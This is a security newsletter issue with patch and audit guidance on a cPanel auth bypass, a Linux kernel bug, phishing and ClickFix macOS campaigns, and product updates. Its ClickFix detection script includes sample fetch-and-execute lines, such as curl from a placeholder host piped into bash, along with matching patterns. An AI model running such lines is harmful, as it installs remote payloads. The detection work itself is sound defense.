ENKVA #004 — cPanel auth bypass on KEV with ransomware flag
CISA added CVE-2026-41940 to the Known Exploited Vulnerabilities catalog on April 30 with the knownRansomwareCampaignUse: Known flag and a remediation due date of May 3, three days after addition. This is the CVE assigned to the cPanel and WHM authentication bypass for which hosting providers including Namecheap firewalled TCP 2083 and 2087 on April 28 while waiting for the patch. ENKVA #002 covered the emergency in real time without a CVE number; the number is now public, the CVSS is 9.8 (v3.1) / 9.3 (v4.0), and CISA has confirmed both exploitation in the wild and ransomware-operator use.
The vulnerability lives in cPanel's login flow and lets unauthenticated remote attackers gain full access to the control panel. Affected versions are cPanel and WHM 11.40.0.0 and later; the VulnCheck advisory lists fixed versions as 11.86.0.41, 11.94.0.28, 11.102.0.39, and the latest patched build 11.136.0.5. WP Squared is fixed at 11.136.1.7 or later.
If you manage cPanel directly, the patch is the easy half. The hard half is auditing what happened during the eight days between the cPanel emergency advisory (April 28) and now. The KEV Known ransomware flag is CISA's signal that operators were already using this in named campaigns by the time the catalog updated, and a control-panel-level account on a hosting server is the kind of foothold ransomware affiliates monetize on the same day.
What to do this week:
- Confirm the patched build is installed. Run whmapi1 get_current_lts_expiration_status and /usr/local/cpanel/cpanel -V on every cPanel/WHM server to confirm the version. Anything below the fixed builds above is exposed.
- Audit cPanel and WHM accounts for unfamiliar logins between April 28 and the install time of your patch. Look at /usr/local/cpanel/logs/access_log, /usr/local/cpanel/logs/login_log, and /var/cpanel/accounting.txt. Treat any successful authentication from an unfamiliar IP during that window as suspect, even if the account is yours. The bypass produces a real session, so log entries look like normal authentication.
- Rotate WHM root, reseller, and any account passwords that were valid during the exposure window. Rotate API tokens too. The CVSS 9.8 vector means the attacker doesn't need credentials to get in, but they may have created or modified credentials once they did.
- If you resell cPanel hosting through a provider, demand written confirmation of patch status and post-patch audit results. "We applied the firewall block and unblocked when the patch shipped" is not the same answer as "we patched, and we found no anomalous logins during the exposure window." If the provider can't say the second sentence, plan for the possibility that some shared infrastructure was touched.
- Restrict the WHM management interface to a VPN or IP allowlist. Internet-reachable WHM on TCP 2087 is the same risk class as internet-reachable RMM management interfaces; last week's KEV adds covered the RMM version of this lesson.
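As an added example (not from the advisory, VulnCheck, or cPanel), a POSIX shell check that classifies a reported cPanel/WHM version against the fixed builds listed above. It assumes the four fixed builds are branch-specific minimums (a server on branch 11.94 needs 11.94.0.28 or higher), treats branches the advisory does not list as exposed, and assumes the version string comes from the commands in step 1 or from /usr/local/cpanel/version (assumed path).

```shell
#!/bin/sh
# Added example: classify a cPanel/WHM version for CVE-2026-41940 exposure.
# Fixed builds are the ones the VulnCheck advisory lists, one per branch.
FIXED_BUILDS="11.86.0.41 11.94.0.28 11.102.0.39 11.136.0.5"

# Compare two dotted versions numerically (up to 4 components).
# Prints lt, gt or eq. Missing components count as 0.
vercmp() {
  i=1
  while [ "$i" -le 4 ]; do
    a=$(printf '%s' "$1" | cut -s -d. -f"$i"); b=$(printf '%s' "$2" | cut -s -d. -f"$i")
    a=${a:-0}; b=${b:-0}
    if [ "$a" -lt "$b" ]; then printf 'lt\n'; return; fi
    if [ "$a" -gt "$b" ]; then printf 'gt\n'; return; fi
    i=$((i+1))
  done
  printf 'eq\n'
}

# Prints one of: unaffected, patched, exposed, unlisted-branch.
# "unlisted-branch" means the advisory names no fixed build for that
# branch; treat it as exposed until the vendor says otherwise.
cpanel_status() {
  ver=$1
  # Affected versions start at 11.40.0.0.
  if [ "$(vercmp "$ver" 11.40.0.0)" = lt ]; then printf 'unaffected\n'; return; fi
  branch=$(printf '%s' "$ver" | cut -s -d. -f1,2)
  for fixed in $FIXED_BUILDS; do
    if [ "$(printf '%s' "$fixed" | cut -s -d. -f1,2)" = "$branch" ]; then
      if [ "$(vercmp "$ver" "$fixed")" = lt ]; then printf 'exposed\n'; else printf 'patched\n'; fi
      return
    fi
  done
  printf 'unlisted-branch\n'
}

# Real use (assumed path for the version file):
#   cpanel_status "$(cat /usr/local/cpanel/version)"
```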
The CVE-2026-41940 timeline is unusually compressed: cPanel emergency advisory on April 28, public CVE assignment April 29, KEV addition April 30 with a Known ransomware flag, three-day federal compliance deadline. The May 3 KEV due date has already passed — treat it as a floor, not a target.
Advisories
Brief 1 — Linux kernel "Copy Fail" CVE-2026-31431 added to KEV May 1
CISA added CVE-2026-31431 to KEV on May 1 with a due date of May 15. The vulnerability — disclosed by Theori as "Copy Fail" — is a logic bug in the kernel's algif_aead AEAD socket interface that lets an unprivileged local user gain root via a deterministic 4-byte write into the page cache of any readable file. CVSS 7.8 (NVD entry). The fix mostly reverts commit 72548b093ee3 from 2017, so the bug is present in every kernel released since 2017. Help Net Security's writeup confirms exploitation against Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, SUSE 16, and Rocky Linux 9.7.
Action: push kernel updates to your Linux fleet this week. The algif_aead module is built into the kernel on most distros (CONFIG_CRYPTO_USER_API_AEAD=y), so the usual modprobe.d blacklist trick does not actually disable it — patching is the only path. Red Hat fixed kernels were not yet available at time of writing; if you run RHEL endpoints, watch the Red Hat advisory and queue the update for the moment it lands. Container hosts that grant AF_ALG socket access are the highest-priority targets.
Brief 2 — "Code of Conduct" multi-stage AiTM campaign hit 35,000 users across 13,000 organizations
Microsoft Threat Intelligence published an analysis on May 4 of a phishing campaign that targeted more than 35,000 users across over 13,000 organizations in 26 countries, with 92% of targets located in the United States. Sectors most affected: Healthcare and Life Sciences (19%), Financial Services (18%), Professional Services (11%), and Technology and Software (11%). The chain runs: compliance-themed email with PDF → Cloudflare CAPTCHA-protected attacker domain → image-CAPTCHA staging page → fake Microsoft sign-in → adversary-in-the-middle token capture. Indicator domains include compliance-protectionoutlook[.]de and acceptable-use-policy-calendly[.]de, and PDF lures use the filename pattern "Awareness Case Log File – [Day] [Date], April 2026.pdf".
Action: add the Microsoft IoC domains to your block lists today. Phishing-resistant MFA (passkeys, FIDO2 security keys, certificate-based authentication) is the durable defense — token-replay attacks succeed against TOTP, push, and SMS but fail against keys bound to the origin. If your tenants are on TOTP or push-only MFA, this campaign is your forcing function to move them. Enable Zero-Hour Auto Purge in Defender for Office 365 for any tenants that don't have it on, and turn on automatic attack disruption in Defender XDR if you have an E5 license.
Brief 3 — Chrome 148 ships 127 security fixes including three Critical use-after-frees
Google promoted Chrome 148.0.7778.96/97 (Windows/Mac) and 148.0.7778.96 (Linux) to stable on May 5 with 127 security fixes — for context, the previous stable update (Chrome 147.0.7727.137/138 on April 28) shipped 30 fixes. Three of the 127 are rated Critical: CVE-2026-7896 (integer overflow in Blink), CVE-2026-7897 (use-after-free in Mobile), and CVE-2026-7898 (use-after-free in Chromoting). Release notes. Microsoft Edge will inherit the Chromium fixes on its own update cadence.
Action: push the update via your endpoint management tool this week and set the minimum Chrome version to 148.0.7778.96 (Linux) / 148.0.7778.96/97 (Windows/Mac). Chrome 147 reaches end of security support once 148 finishes rollout, so any device still on 147.x after the next maintenance window is unpatched.
Brief 4 — Microsoft details ClickFix macOS infostealer campaign
Microsoft's Threat Intelligence team documented three ClickFix macOS campaigns that ran February through April 2026. The lure: Squarespace, Medium, and Craft note pages claiming to fix common macOS issues, instructing users to paste Base64-encoded Terminal commands. The payload is one of three infostealers — Shub Stealer (self-identifies in code as "SHub Stealer"), Macsync, and AMOS — which exfiltrate browser credentials and cookies, Keychain entries, iCloud account data, cryptocurrency wallet keys, SSH keys, and Telegram data.
Action: if you manage macOS endpoints, brief users to treat any webpage instructing them to paste a Terminal command as a phishing attempt. Defender for Endpoint on macOS detects all three families — confirm cloud-delivered protection and EDR-in-block-mode are on. For tenants without Defender on macOS, watch for Terminal sessions executing curl | base64 -d | sh patterns or sequences invoking gunzip and osascript together.
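As an added example (not Microsoft's detection logic and not from the original brief), a coarse POSIX shell classifier for the ClickFix command-line shapes the action item names, run over constructed sample Terminal command lines. It also accepts macOS's older base64 -D decode flag alongside -d; in real use, feed it process command lines exported from your EDR or the unified log, one per line.

```shell
#!/bin/sh
# Added example: flag Terminal command lines that match ClickFix patterns.
# Returns 0 (match) if the line shows any of:
#  1. base64 decode (-d or macOS -D) piped straight into sh/bash/zsh
#  2. gunzip and osascript appearing together on one command line
#  3. curl or wget output piped straight into sh/bash/zsh
clickfix_flag() {
  line=$1
  if printf '%s' "$line" | grep -Eq 'base64[[:space:]]+-[dD][[:space:]]*\|[[:space:]]*(sh|bash|zsh)([[:space:]]|$)'; then
    return 0
  fi
  if printf '%s' "$line" | grep -q 'gunzip' && printf '%s' "$line" | grep -q 'osascript'; then
    return 0
  fi
  if printf '%s' "$line" | grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(sh|bash|zsh)([[:space:]]|$)'; then
    return 0
  fi
  return 1
}

# Count matching lines in a newline-separated batch read from stdin.
clickfix_count() {
  n=0
  while IFS= read -r l; do
    if clickfix_flag "$l"; then n=$((n+1)); fi
  done
  printf '%s\n' "$n"
}

# Constructed sample command lines (not real campaign indicators).
# Lines 1, 2 and 3 should match; lines 4 and 5 should not.
SAMPLE='echo aGVsbG8= | base64 -d | sh
curl -fsSL https://example.invalid/fix.sh | bash
echo H4sI | base64 -D | gunzip | osascript
ls -la /Applications
base64 -d notes.txt > notes.bin'

# Usage: printf '%s\n' "$SAMPLE" | clickfix_count
```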
Product changes
Brief 5 — Defender XDR adds identity-focused hunting graph scenarios
The May 2026 entry on the Defender XDR What's new page documents new predefined scenarios in the advanced hunting graph: Kerberoast and AS-REP roast paths, domain compromise routes, OAuth application risks, and external user access to cloud resources. The graph spans on-premises Active Directory and Entra ID, so a single query can trace a privilege-escalation path that crosses the hybrid boundary.
Action: open the hunting graph in the Defender portal, run the OAuth application risks scenario against each tenant, and triage anything flagged. A malicious OAuth app with Mail.Read consent reads mail without triggering a sign-in alert, so consent grants tend to slip past sign-in-centric monitoring. The Kerberoast and AS-REP scenarios are most useful for tenants with on-premises AD and any service accounts using SPNs.
Brief 6 — Intune service release 2604 lands with EPM expansion, Edge v139 baseline, Apple device support
The Intune What's new page documents service release 2604 for the week of April 27. Highlights: Endpoint Privilege Management approved-elevation requests now work for all users on a device, not just the primary or enrolling user — a fix for shared workstations. The Microsoft Edge v139 security baseline is available with new and updated default settings. Apple userless ADE for visionOS 26+ and tvOS 26+ lets you enroll Vision Pro and Apple TV through Apple Business/School Manager. Ubuntu 26.04 LTS is supported (Ubuntu 22.04 LTS support ends August 2026). The Intune Management Extension minimum version on Windows is now 1.58.103.0 — earlier versions stop receiving Win32 app, PowerShell script, remediation, and platform-script payloads.
Action: check the IME version on your Windows fleet (Get-WmiObject -Class Win32_Product -Filter "Name='Microsoft Intune Management Extension'") and trigger a refresh on anything below 1.58.103.0 — silently broken Win32 app deployment is the failure mode here. Re-import the Edge security baseline if you maintain a custom version with deltas.
Brief 7 — Entra ships May 2026 GA wave: iOS CBA, GSA iOS client, Cloud Firewall, PIM enforcement
The Entra What's new page lists a substantial general-availability batch for May. Certificate-based authentication on native iOS sign-ins as a second factor is GA, addressing prior known issues — CBA also moves to the third option in system-preferred MFA methods. The Global Secure Access iOS client is GA. GSA Cloud Firewall for Remote Networks lets administrators apply 5-tuple filtering to all internet traffic from branch offices through GSA. Conditional Access enforcement on every PIM activation is GA, so role activation can require fresh MFA or device-compliance evaluation. Configurable Token Lifetime Policies are GA, restoring per-tenant control over access, ID, and SAML token lifetimes.
Action: if you maintain CBA policies for tenants on iOS, retest the second-factor flows against the GA build before assuming the prior preview-version issues are gone. Turn on Conditional Access enforcement on PIM activation for any tenant where role assignments drift between MFA states — a finance executive with eligible Global Admin who activates from an unmanaged device should re-prompt, even if the morning sign-in did not.
Field notes
Brief 8 — Datto EDR v13426 AMSI integration crashes Microsoft Word on file open
A r/msp PSA documents that Datto EDR v13426 (released April 17 per the release notes) introduced AMSI integration whose DLL — damsi_com_011.dll under C:\ProgramData\CentraStage\AEMAgent\RMM.AdvancedThreatDetection\amsi\ — crashes Microsoft Word with exception 0xc0000005 (access violation) when opening files. The crash hits SharePoint, OneDrive, and Teams documents most reliably; Event Viewer Application log Event ID 1000 names WINWORD.EXE as the faulting application and damsi_com_011.dll as the faulting module. Clearing %LOCALAPPDATA%\Microsoft\Office\16.0\OfficeFileCache produces a temporary fix that recurs on the next scan cycle. A Kaseya engineer confirmed in-thread that the R&D team is investigating.
Action: if you manage Datto EDR, the workaround documented in the thread is to disable Scripts in the real-time-protection policy (Datto EDR > Policy > Real-time Protection > Real-time Options > Disable Scripts), which stops the injection immediately on the next policy sync. This neutralizes script-based AMSI scanning, so use it as a temporary measure and re-enable when Kaseya ships a fixed agent. If you see correlated svchost.exe or ntdll.exe crashes around the same upgrade window, investigate them on their own merits — the PSA author flagged them as possible collateral but not confirmed.